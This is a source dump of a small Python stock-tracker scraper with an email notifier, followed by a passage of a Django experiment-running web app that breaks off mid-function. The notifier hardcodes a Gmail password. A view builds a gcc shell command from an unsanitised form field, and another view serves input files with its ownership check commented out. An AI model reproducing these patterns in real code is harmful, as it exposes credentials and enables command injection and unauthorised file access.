"text": "[tox]\nenvlist =\n {py36,py37,py38}\n coverage\n\n[testenv]\ndeps =\n -rrequirements.txt\n\nsetenv =\n TESTPATH=tests/\n RCFILE=setup.cfg\ncommands =\n coverage run --rcfile={env:RCFILE} --source=tda -p -m pytest {env:TESTPATH}\n\n[testenv:coverage]\nskip_install = true\ncommands =\n coverage combine\n coverage report\n coverage html\n"
},
{
"alpha_fraction": 0.607800304889679,
"alphanum_fraction": 0.6171606779098511,
"avg_line_length": 35.42045593261719,
"blob_id": "d3d011ad32ff5e102e9fd7501946d71fdc675c6e",
"content_id": "9294fe4915050db7a93dacbba4b6d2e89523fd2d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3205,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 88,
"path": "/tests/test_utils.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "from unittest.mock import MagicMock\n\nimport datetime\nimport json\nimport unittest\n\nfrom tda.orders.equities import EquityOrderBuilder\nfrom tda.utils import AccountIdMismatchException, Utils\nfrom tda.utils import UnsuccessfulOrderException\nfrom . import test_utils\nfrom .utils import no_duplicates, MockResponse\n\n\nclass UtilsTest(unittest.TestCase):\n\n def setUp(self):\n self.mock_client = MagicMock()\n self.account_id = 10000\n self.utils = Utils(self.mock_client, self.account_id)\n\n self.order_id = 1\n\n self.maxDiff = None\n\n ##########################################################################\n # extract_order_id tests\n\n @no_duplicates\n def test_extract_order_id_order_not_ok(self):\n response = MockResponse({}, False)\n with self.assertRaises(\n UnsuccessfulOrderException, msg='order not successful'):\n self.utils.extract_order_id(response)\n\n @no_duplicates\n def test_extract_order_id_no_location(self):\n response = MockResponse({}, True, headers={})\n self.assertIsNone(self.utils.extract_order_id(response))\n\n @no_duplicates\n def test_extract_order_id_no_pattern_match(self):\n response = MockResponse({}, True, headers={\n 'Location': 'https://api.tdameritrade.com/v1/accounts/12345'})\n self.assertIsNone(self.utils.extract_order_id(response))\n\n @no_duplicates\n def test_get_order_nonmatching_account_id(self):\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(\n self.account_id + 1)})\n with self.assertRaises(\n AccountIdMismatchException,\n msg='order request account ID != Utils.account_id'):\n self.utils.extract_order_id(response)\n\n @no_duplicates\n def test_get_order_nonmatching_account_id_str(self):\n self.utils = Utils(self.mock_client, str(self.account_id))\n\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(\n self.account_id + 1)})\n with self.assertRaises(\n AccountIdMismatchException,\n msg='order request account ID != Utils.account_id'):\n self.utils.extract_order_id(response)\n\n @no_duplicates\n def test_get_order_success(self):\n order_id = self.account_id + 100\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(\n self.account_id, order_id)})\n self.assertEqual(order_id, self.utils.extract_order_id(response))\n\n @no_duplicates\n def test_get_order_success_str_account_id(self):\n self.utils = Utils(self.mock_client, str(self.account_id))\n\n order_id = self.account_id + 100\n response = MockResponse({}, True, headers={\n 'Location':\n 'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(\n self.account_id, order_id)})\n self.assertEqual(order_id, self.utils.extract_order_id(response))\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 16.799999237060547,
"blob_id": "6adb26c7cb1525fc47a36ace34b623bd0dd4b834",
"content_id": "654c7142531ec8736d83943220f048b274786f1f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 5,
"path": "/tda/orders/__init__.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\nfrom . import common\nfrom . import equities\nfrom . import generic\n\n"
},
{
"alpha_fraction": 0.6199616193771362,
"alphanum_fraction": 0.6201748847961426,
"avg_line_length": 33.605167388916016,
"blob_id": "18f3960514e20df4e383985abe5b508c4c75f2aa",
"content_id": "9c4ec520d6d9685ea040d4186afe02fdb76d113c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9378,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 271,
"path": "/tda/orders/equities.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\nfrom tda.orders.common import InvalidOrderException\nfrom tda.orders.common import InvalidOrderException, Duration, Session\n\n\n_DEPRECATION_WARNED = False\n\n\nclass EquityOrderBuilder:\n '''Helper class to construct equity orders.'''\n\n def __init__(self, symbol, quantity):\n '''Create an order for the given symbol and quantity. Note all\n unspecified parameters must be set prior to building the order spec.\n\n **WARNING:** This class is deprecated in favor of the\n :ref:`tda.orders.generic.OrderBuilder` and the order template helpers.\n It will be removed in a future release.\n\n :param symbol: Symbol for the order\n :param quantity: Quantity of the order\n '''\n global _DEPRECATION_WARNED\n if not _DEPRECATION_WARNED:\n import sys\n print('WARNING: EquityOrderBuilder has been deprecated. Please ' +\n 'migrate to one of the new order templates or use the ' +\n 'generic OrderBuilder class. You can find documentation on ' +\n 'its replacement heres: https://tda-api.readthedocs.io/en/'+\n 'stable/order-templates.html', file=sys.stderr)\n _DEPRECATION_WARNED = True\n\n self.symbol = symbol\n self.quantity = quantity\n\n self.instruction = None\n self.order_type = None\n self.price = None\n self.duration = None\n self.session = None\n\n def __assert_set(self, name):\n value = getattr(self, name)\n if value is None:\n raise InvalidOrderException('{} must be set'.format(name))\n return value\n\n # Instructions\n class Instruction(Enum):\n '''Order instruction'''\n BUY = 'BUY'\n SELL = 'SELL'\n\n def set_instruction(self, instruction):\n '''Set the order instruction'''\n assert isinstance(instruction, self.Instruction)\n self.instruction = instruction\n return self\n\n # Order types\n class OrderType(Enum):\n '''Order type'''\n MARKET = 'MARKET'\n LIMIT = 'LIMIT'\n\n def set_order_type(self, order_type):\n '''Set the order type'''\n assert isinstance(order_type, self.OrderType)\n self.order_type = order_type\n return self\n\n # Price\n def set_price(self, price):\n '''Set the order price. 
Must be set for ``LIMIT`` orders.'''\n assert price > 0.0\n self.price = price\n return self\n\n # Durations\n def set_duration(self, duration):\n '''Set the order duration'''\n assert isinstance(duration, Duration)\n self.duration = duration\n return self\n\n # Sessions\n def set_session(self, session):\n '''Set the order's session'''\n assert isinstance(session, Session)\n self.session = session\n return self\n\n def build(self):\n '''Build the order spec.\n\n :raise InvalidOrderException: if the order is not fully specified\n '''\n spec = {\n 'orderType': self.__assert_set('order_type').value,\n 'session': self.__assert_set('session').value,\n 'duration': self.__assert_set('duration').value,\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': self.__assert_set('instruction').value,\n 'quantity': self.quantity,\n 'instrument': {\n 'symbol': self.symbol,\n 'assetType': 'EQUITY'}\n }]\n }\n\n if self.order_type == self.OrderType.LIMIT:\n spec['price'] = self.__assert_set('price')\n else:\n assert self.price is None\n\n return spec\n\n\n##########################################################################\n# Buy orders\n\n\ndef equity_buy_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY, symbol, quantity))\n\n\ndef equity_buy_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY, symbol, quantity))\n\n##########################################################################\n# Sell orders\n\n\ndef equity_sell_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n sell market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL, symbol, quantity))\n\n\ndef equity_sell_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n sell limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n 
.add_equity_leg(EquityInstruction.SELL, symbol, quantity))\n\n##########################################################################\n# Short sell orders\n\n\ndef equity_sell_short_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n short sell market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL_SHORT, symbol, quantity))\n\n\ndef equity_sell_short_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n short sell limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.SELL_SHORT, symbol, quantity))\n\n##########################################################################\n# Buy to cover orders\n\n\ndef equity_buy_to_cover_market(symbol, quantity):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy-to-cover market order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.MARKET)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY_TO_COVER, symbol, quantity))\n\n\ndef equity_buy_to_cover_limit(symbol, quantity, price):\n '''\n Returns a pre-filled :class:`~tda.orders.generic.OrderBuilder` for an equity\n buy-to-cover limit order.\n '''\n from tda.orders.common import Duration, EquityInstruction\n from tda.orders.common import OrderStrategyType, OrderType, Session\n from tda.orders.generic import OrderBuilder\n\n return (OrderBuilder()\n .set_order_type(OrderType.LIMIT)\n .set_price(price)\n .set_session(Session.NORMAL)\n .set_duration(Duration.DAY)\n .set_order_strategy_type(OrderStrategyType.SINGLE)\n .add_equity_leg(EquityInstruction.BUY_TO_COVER, symbol, quantity))\n"
}
] | 7 |
vpos/Medovina_Stock_Tracker | https://github.com/vpos/Medovina_Stock_Tracker | e42467bcb5e0bf3470a3d735eccf4d20c81bab2c | 65c14c3f308f176c78d9ee4905e9e4570b0cdcf3 | e06230f18aaa91e474d62f2dc9b65529fac1c544 | refs/heads/master | 2022-04-03T02:17:09.289251 | 2020-01-24T20:42:44 | 2020-01-24T20:42:44 | 236,071,186 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8199999928474426,
"alphanum_fraction": 0.8199999928474426,
"avg_line_length": 24,
"blob_id": "d3906438f5ae839cab12292bd65372d874419ded",
"content_id": "c9cd078a158cfd92f09c1bffa04578dc93b78975",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 2,
"path": "/README.md",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "# Medovina_Stock_Tracker\nHlídač keltské medoviny.\n"
},
{
"alpha_fraction": 0.6321112513542175,
"alphanum_fraction": 0.6691951155662537,
"avg_line_length": 34.43283462524414,
"blob_id": "f9bc485ec2e4661a66f3f1bab8d910eaeaf0a3ad",
"content_id": "fedfc50e5b4d21e0922af8d6385a78f76c200e33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2383,
"license_type": "no_license",
"max_line_length": 527,
"num_lines": 67,
"path": "/scraper.py",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "from lxml import html\nfrom datetime import datetime\nimport time\nimport requests\nimport re\nimport traceback\nfrom lxml.cssselect import CSSSelector\nimport string\n\nimport notifier as Notif\nimport helpers as Helpers\n\ntry:\n # https://eshop.georgebee.com/keltska/ \n medovinyEndpoint = 'https://eshop.georgebee.com/keltska/'\n unavailableMsg = 'Momentálně nedostupné'\n availabilityFile = '/root/Medovina_Stock_Tracker/availability_status'\n availabilityFromFile = Helpers.read_file(availabilityFile)\n\n currentDatetime = datetime.now().strftime(\"%d.%m.%Y %H:%M:%S\")\n\n responseStatus = 0\n requestNumber = 0\n response = ''\n while (responseStatus != 200 and requestNumber < 10):\n time.sleep(3) # make a request every 3 secs\n requestNumber += 1\n try:\n response = requests.get(medovinyEndpoint)\n responseStatus = response.status_code\n except:\n pass\n\n if requestNumber < 10:\n scrapedHtml = str(response.content.decode('utf-8'))\n \n if unavailableMsg in scrapedHtml:\n Helpers.write_to_file(availabilityFile, f'{currentDatetime}: {unavailableMsg}')\n \n elif unavailableMsg in availabilityFromFile:\n # send notif email\n Helpers.write_to_file(availabilityFile, f'{currentDatetime}: Dostupné!')\n urlButton = f'<a href=\"{medovinyEndpoint}\"><button style=\"margin-left:0; box-shadow: rgb(41, 108, 146) 0px 4px 9px -2px; background: linear-gradient(rgb(41, 108, 146) 5%, rgb(41, 108, 146) 100%) rgb(41, 108, 146); border-radius: 4px; border: 1px solid rgb(41, 108, 146); display: inline-block; color: rgb(255, 255, 255); font-family: Helvetica; font-size: 15px; font-weight: bold; padding: 5px 14px; cursor: grab !important; text-decoration: none; text-shadow: rgb(41, 73, 123) 0px 1px 0px;\">Přejít na odkaz</button></a>'\n\n notifMessage = f\"\"\"\\\n <html>\n <body>\n <p> Keltská medovina je naskladněná! <br>\n <br>\n {urlButton}\n </p>\n </body>\n </html>\n \"\"\"\n Notif.email_notif('[email protected]','','Medovina Scraper - Medovina na skladě!', notifMessage)\n\nexcept:\n traceback.print_exc()\n exception = '\\n'.join(traceback.format_exc())\n errorMessage = f\"\"\"\\\n <html>\n <body>\n <p> A new error has just been produced: {exception} </p>\n </body>\n </html>\n \"\"\"\n Notif.email_notif('[email protected]','[email protected]','Medovina Scraper - New Error', errorMessage)"
},
{
"alpha_fraction": 0.6699375510215759,
"alphanum_fraction": 0.6779661178588867,
"avg_line_length": 24.477272033691406,
"blob_id": "3deff66eed43c91ddc8140d965278871af20a7da",
"content_id": "70b5adf370696e90880a3f22647b28fb8436677b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1121,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 44,
"path": "/notifier.py",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "# function to notify about:\n# 1. houses\n# 2. errors\n# parameters\n\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nimport time\n\n# TODO setup email \ndef email_notif(receiver, cc, subject, msg):\n sender_email = \"[email protected]\"\n password = \"enth364+!0N\"\n\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = subject\n message[\"From\"] = sender_email\n message[\"To\"] = receiver\n message['Cc'] = cc\n\n text = f\"\"\"\\\n \"\"\"\n html = f\"\"\"\\\n {msg}\n \"\"\"\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part1)\n message.attach(part2)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(\n sender_email, [receiver, cc], message.as_string()\n )\n server.quit()\n"
},
{
"alpha_fraction": 0.6080306172370911,
"alphanum_fraction": 0.6137667298316956,
"avg_line_length": 19.959999084472656,
"blob_id": "916f224002bd8dca308ccdca0417262e0ecc9c2d",
"content_id": "bdb5dedef106f163fd0995125b58839ab614161d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 25,
"path": "/helpers.py",
"repo_name": "vpos/Medovina_Stock_Tracker",
"src_encoding": "UTF-8",
"text": "# support functions that are used in multiple files\n\nimport gspread\nimport json\nfrom oauth2client.client import SignedJwtAssertionCredentials\nimport sys,traceback\nimport codecs\n\nsys.path.append('../')\n\n\ndef write_to_file(filename, data):\n f= codecs.open(filename,'w', 'utf-8') \n f.write(data)\n f.close()\n\ndef read_file(filename):\n \n f= codecs.open(filename,'r', 'utf-8') \n list = []\n for items in f:\n list.append(items)\n f.close()\n\n return items"
}
] | 4 |
marcelacrosariol/TG | https://github.com/marcelacrosariol/TG | fcb2c1b49951d6c6290616a109af333f54964ca0 | 1d0a08cebb67e23fed8e8cdc772ba3902a153a48 | 8e0fab42d751372581b0e77892bb9ba369bf232d | refs/heads/master | 2021-08-23T21:52:41.674642 | 2017-12-06T18:17:04 | 2017-12-06T18:17:04 | 103,475,414 | 0 | 0 | null | 2017-09-14T02:27:07 | 2015-11-23T17:44:07 | 2016-01-09T03:27:55 | null |
[
{
"alpha_fraction": 0.5305126309394836,
"alphanum_fraction": 0.5305126309394836,
"avg_line_length": 22.20754623413086,
"blob_id": "664dabb28f0d3fce12b9809dfb41e8c5dd8f6f70",
"content_id": "f16c672f430722034c05cac3f22f7250e267dad6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1235,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 53,
"path": "/Django Proj/webapp/templates/footer.html",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "<div class=\"container\">\n\t<div id=\"footer\">\n\n\t\t{% if request.user.is_superuser == False %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\"> Informações </li>\n\t\t\t\t<li><a href=\"\"> Sobre </a></li>\n\t\t\t\t<li><a href=\"\"> Contato </a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t\t{% if request.user.is_authenticated == False %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Acesso</li>\n\t\t\t\t<li><a href=\"\"> Cadastrar </a></li>\n\t\t\t\t<li><a href=\"\"> Entrar</a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t\t{% if request.user.is_authenticated %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Experimentos</li>\n\t\t\t\t<li><a href=\"\"> Nova Execução </a></li>\n\t\t\t\t<li><a href=\"\"> Exemplos </a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t\t{% if request.user.is_superuser %}\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Usuários</li>\n\t\t\t\t<li><a href=\"\"> Listar todos</a></li>\n\t\t\t\t<li><a href=\"\"> Cadastrar novo</a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t<div class=\"footer-box\">\n\t\t\t<ul>\n\t\t\t\t<li class=\"footer-title\">Algoritmos</li>\n\t\t\t\t<li><a href=\"\"> Listar todos</a></li>\n\t\t\t\t<li><a href=\"\"> Cadastrar novo</a></li>\n\t\t\t\t<li><a href=\"\"> Estatísticas </a></li>\n\t\t\t</ul>\n\t\t</div>\n\t\t{% endif %}\n\n\t</div>\n</div>"
},
{
"alpha_fraction": 0.7933753728866577,
"alphanum_fraction": 0.7933753728866577,
"avg_line_length": 34.22222137451172,
"blob_id": "8002c82b5783a830c7cdaeb9144363a77b750783",
"content_id": "32b5dd700e0a8c01ef4ed0c29647eb31851c11fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 18,
"path": "/Django Proj/webapp/webapp/regbackend.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "# from registration.views import RegistrationView\nfrom registration.backends.default.views import RegistrationView, ActivationView\nfrom experiment.forms import AppUserForm\nfrom experiment.models import AppUser\n\nclass MyRegistrationView(RegistrationView):\n\n\tform_class = AppUserForm\n\tsuccess_url = \"complete\"\n\n\tdef register(self, form_class):\n\t\tnew_user = super(MyRegistrationView,self).register(form_class)\n\t\tuser_profile = AppUser()\n\t\tuser_profile.usuario = new_user\n\t\tuser_profile.nickname = form_class.cleaned_data['nickname']\n\t\tuser_profile.company = form_class.cleaned_data['company']\n\t\tuser_profile.save()\n\t\treturn user_profile\n"
},
{
"alpha_fraction": 0.615523099899292,
"alphanum_fraction": 0.6163702011108398,
"avg_line_length": 31.734834671020508,
"blob_id": "f3a07ba22f9c9d185f27593cdb76dbc387abc879",
"content_id": "a622e20e5166532003ede7203961c6f3c4096d05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18895,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 577,
"path": "/Django Proj/webapp/experiment/views.py",
"repo_name": "marcelacrosariol/TG",
"src_encoding": "UTF-8",
"text": "from django.db.models import Count\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\nfrom experiment.forms import *\nfrom experiment.models import Execution, Algorithm, AppUser\nfrom django.http import HttpResponseRedirect, HttpResponse \nfrom django.core.urlresolvers import reverse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n# from django.core.files import File\n# jsonview - Crispy validation\n\nimport json, os\nfrom jsonview.decorators import json_view\nfrom crispy_forms.utils import render_crispy_form\nfrom crispy_forms.helper import FormHelper\nfrom django.contrib import messages\n# paginator\nfrom experiment.paginator import paginate\n\nfrom experiment.tasks import RunExperiment\nfrom random import randint\n\n#################### HOME #################### \n\ndef home(request):\n title = \"Home\"\n if not request.user.is_authenticated(): \n context = {\n 'title': title\n }\n return render(request, \"welcome.html\", context)\n else:\n form = (request.POST or None)\n showOpt = 'Todas'\n if request.method == 'POST':\n showOpt = request.POST.get(\"showOpt\")\n executionList = Execution.objects.filter().order_by('-id') if showOpt == 'Todas' else Execution.objects.filter(request_by__usuario__id=request.user.id).order_by('-id')\n else:\n executionList = Execution.objects.filter(request_by__usuario__id=request.user.id).order_by('-id')\n\n try:\n UserProf = AppUser.objects.get(usuario__id=request.user.id)\n except:\n print (\"Erro. Criando novo perfil\")\n user = User.objects.get(id=request.user.id)\n UserProf = AppUser(usuario=user)\n UserProf.save()\n print (\"Criado novo UserProf\")\n\n data, pageI = createPagination(request, executionList, UserProf.resultsPerPage)\n\n context = {\n 'showOpt': showOpt,\n 'title': title,\n 'data': data,\n 'pagesIndex': pageI,\n }\n return render(request, \"home.html\", context)\n\n#################### ABOUT #################### \n\ndef about(request):\n return render(request, \"about.html\", {})\n\n#################### CONTACT #################### \n\ndef contact(request):\n form = ContactForm(request.POST or None)\n if form.is_valid():\n subject = 'Portal Friends - Mensagem de %s ' % (\n form.cleaned_data.get(\"nome\"))\n from_email = settings.EMAIL_HOST_USER \n to_email = from_email\n sender = form.cleaned_data.get(\"email\")\n message = \"Contact: \" + sender + \"\\n\" + form.cleaned_data.get(\"mensagem\")\n send_mail(subject,\n message,\n from_email,\n [to_email],\n fail_silently=False)\n return HttpResponseRedirect(reverse('contact'))\n context = {\n 'form': form,\n }\n return render(request, \"contact.html\", context)\n\n#################### FILES DOWNLOAD / UPLOAD #################### \n\ndef downloadInputFile(request):\n expId = request.GET.get('id')\n execution = Execution.objects.get(pk=expId)\n # if (execution.request_by.usuario.id == request.user.id):\n # response = HttpResponse(\n # execution.inputFile, content_type='application/force-download')\n # response[\n # 'Content-Disposition'] = 'attachment; filename=\"entrada-Experimento-' + str(expId) + '\"'\n # return response\n # criar alerta\n response = HttpResponse(\n execution.inputFile, content_type='application/force-download')\n response[\n 'Content-Disposition'] = 'attachment; filename=\"entrada-Experimento-' + str(expId) + '\"'\n return 
response\n # return HttpResponseRedirect(reverse('home'))\n\ndef downloadOutputFile(request):\n expId = request.GET.get('id')\n execution = Execution.objects.get(pk=expId)\n if (execution.request_by.usuario.id == request.user.id or request.user.is_superuser):\n # print (execution.outputFile.url)\n # print (\"Autorizado\")\n response = HttpResponse(\n execution.outputFile, content_type='application/force-download')\n response['Content-Disposition'] = 'attachment; filename=\"Resultado-Experimento-' + str(expId) + '\"'\n return response\n # print (\"Nao autorizado\")\n # criar alerta\n return HttpResponseRedirect(reverse('home'))\n\ndef downloadSample(request, alg):\n file = Algorithm.objects.get(nameAlg=alg).sample\n file_path = file.path\n \n response = HttpResponse(file, content_type='application/force-download')\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path) \n return response\n\n#################### ADMIN - ALGORITHMS ####################\n\ndef listAlg(request):\n algorithmList = Algorithm.objects.filter().order_by('-idAlg') \n perPage = AppUser.objects.get(usuario=request.user.id).resultsPerPage\n\n data, pageI = createPagination(request, algorithmList, perPage)\n\n context = {\n 'title': 'Algoritmos',\n 'data': data,\n 'pagesIndex': pageI,\n }\n\n return render(request, \"admin/algorithm.html\", context)\n\ndef seeAlg(request, alg):\n title=\"Algoritmo\"\n\n algL = Algorithm.objects.get(idAlg=alg)\n\n data = {'nameAlg': algL.nameAlg, 'desc':algL.desc, 'sample':algL.sample,'file':algL.file}\n form = AlgorithmForm(request.POST or None, initial=data)\n\n context={\n 'title': title,\n 'form': form,\n 'idAlg': algL.idAlg,\n }\n\n return render(request, \"admin/edit_alg.html\", context)\n\ndef addAlg(request):\n form = AlgorithmForm(request.POST or None)\n return render(request, \"admin/add_algorithm.html\", {'form':form})\n\ndef updateAlg(request,idAlg):\n desc = request.POST.get(\"desc\")\n clear = request.POST.get(\"sample-clear\")\n\n algorithm = Algorithm.objects.get(idAlg=idAlg)\n \n if (clear == 'on'): algorithm.sample = None\n elif ('sample' in request.FILES): algorithm.sample = request.FILES['sample']\n\n algorithm.desc = desc\n algorithm.save()\n\n return HttpResponseRedirect(reverse('listAlgorithm'))\n \ndef saveAlg(request):\n\n #Get data from form\n name = request.POST.get('nameAlg')\n desc= request.POST.get('desc')\n algFile = request.FILES['file']\n \n #Get extension of the uploaded file\n extension = algFile.name.split(\".\")[-1].lower()\n \n #Default path of uploaded algorithms\n path = settings.MEDIA_ROOT + \"/algorithms/\"\n \n newAlg = Algorithm()\n newAlg.nameAlg = name\n newAlg.desc = desc\n newAlg.command = path + \"/\" +algFile.name\n newAlg.file=algFile\n \n if ('sample' in request.FILES): \n sample = request.FILES['sample']\n newAlg.sample=sample\n \n newAlg.save()\n \n #If the file needs to be compiled\n if (extension== 'c'):\n os.system(\"gcc \" + newAlg.file.path + \" -o \" + path + name)\n newAlg.command = path + name\n\n newAlg.save()\n\n messages.success(request, \"Algoritmo salvo com successo\")\n\n return HttpResponseRedirect(reverse('listAlgorithm'))\n\n#################### ADMIN - STATISTICS ####################\n\ndef appStatistics(request):\n form = YearChartForm(request.POST or None)\n if request.method == 'POST':\n year = request.POST.get('year')\n else: \n year = '2017' \n\n #Dataset\n items = {}\n #For each algorithm in the database\n for algorithm in Algorithm.objects.all():\n \n data = []\n label = 
algorithm.nameAlg\n \n for month in range(12):\n qtd = Execution.objects.filter(algorithm=algorithm.pk,date_requisition__month=month+1, date_requisition__year=year).count()\n data.append(qtd)\n \n items[algorithm.nameAlg] = data \n\n return render(request, \"admin/statistics.html\", {'form':form, 'dataset': json.dumps(items)})\n\n#################### ADMIN - USERS ####################\n\ndef listUsers(request):\n title = 'Usuários'\n appUserList = AppUser.objects.filter().order_by('-id')\n\n perPage = AppUser.objects.get(usuario=request.user.id).resultsPerPage\n\n data, pageI = createPagination(request, appUserList, perPage)\n\n context = {\n 'title': title,\n 'data': data,\n 'pagesIndex': pageI,\n }\n\n return render(request, \"admin/users.html\", context)\n\ndef seeUser(request, appUser, authUser):\n\n authUser = User.objects.get(username=authUser)\n appU = AppUser.objects.get(nickname=appUser, usuario=authUser.id)\n\n nickname = appU.nickname\n company = appU.company\n choice = appU.notification\n resultsPerPage = appU.resultsPerPage\n\n email = 